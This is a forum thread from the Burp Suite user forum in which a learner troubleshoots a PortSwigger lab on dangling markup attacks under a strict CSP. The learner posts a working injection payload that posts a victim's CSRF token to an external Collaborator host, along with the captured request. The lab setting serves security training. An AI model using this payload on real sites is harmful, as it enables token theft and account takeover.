Burp Suite User Forum

Create new post

Issue with "Reflected XSS protected by very strict CSP, with dangling markup attack" Lab

Prajyot | Last updated: Dec 27, 2023 10:53AM UTC

I understand that the current solution for this lab is broken because of Chrome's recent updates. I believe that I may have found an alternative solution, since I get an interaction with the CSRF token in the request body on my collaborator when I try it on myself. However it doesn't seem to work when I deliver it to the victim. Here's my payload for reference: ``` <script> location = 'https://0a49005803315b4185f35e92000600e2.web-security-academy.net/my-account?email=%22%3E%3C/form%3E%3Cform%20action=%22https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com%22%20id=%22x%22%20method=%22POST%22%3E%3Cinput%20type=%22submit%22%20value=%22Click%20Me%22%3E%3Cinput%20type=%22hidden%22%20name=%22data%22%20value=%27'; </script> ``` Here's how my payload renders when the page loads: ``` <form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST"> <label>Email</label> <input required="" type="email" name="email" value=""> </form> <form action="https://fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com" id="x" method="POST"><input type="submit" value="click me"> <input type="hidden" name="data" value="&quot;> <input required type=&quot;hidden&quot; name=&quot;csrf&quot; value=&quot;i0czssDyg8WAQ1WQkQXc3s7doqUg0Gtw&quot;> <button class=" button'=""> Update email </form> ``` And the interaction I get on collaborator: ``` POST / HTTP/1.1 Host: fxglmiv6o6vmf3cpl6pv2dier5xwlm9b.oastify.com Connection: keep-alive Content-Length: 202 Cache-Control: max-age=0 sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://0a49005803315b4185f35e92000600e2.web-security-academy.net Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0a49005803315b4185f35e92000600e2.web-security-academy.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 data=%22%3E%0D%0A++++++++++++++++++++++++++++%3Cinput+required+type%3D%22hidden%22+name%3D%22csrf%22+value%3D%22akQtuN2ZLE9IJAoKsrnsO2gAw3MVPBRR%22%3E%0D%0A++++++++++++++++++++++++++++%3Cbutton+class%3D ```

Dominyque, PortSwigger Agent | Last updated: Dec 27, 2023 01:03PM UTC

Hi The lab should solve with the given solution. If you are experiencing issues with the lab, can you please send a screen recording of your attempt to support@portswigger.net?

Prajyot | Last updated: Dec 28, 2023 05:20AM UTC

Is the victim user configured to search and click on anchor tags only?

Dominyque, PortSwigger Agent | Last updated: Dec 28, 2023 07:30AM UTC

Hi Prajyot It is beyond the scope of technical support to provide guidance outside of using the given solution.

Prajyot | Last updated: Dec 28, 2023 07:59AM UTC

well its solved now :)

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.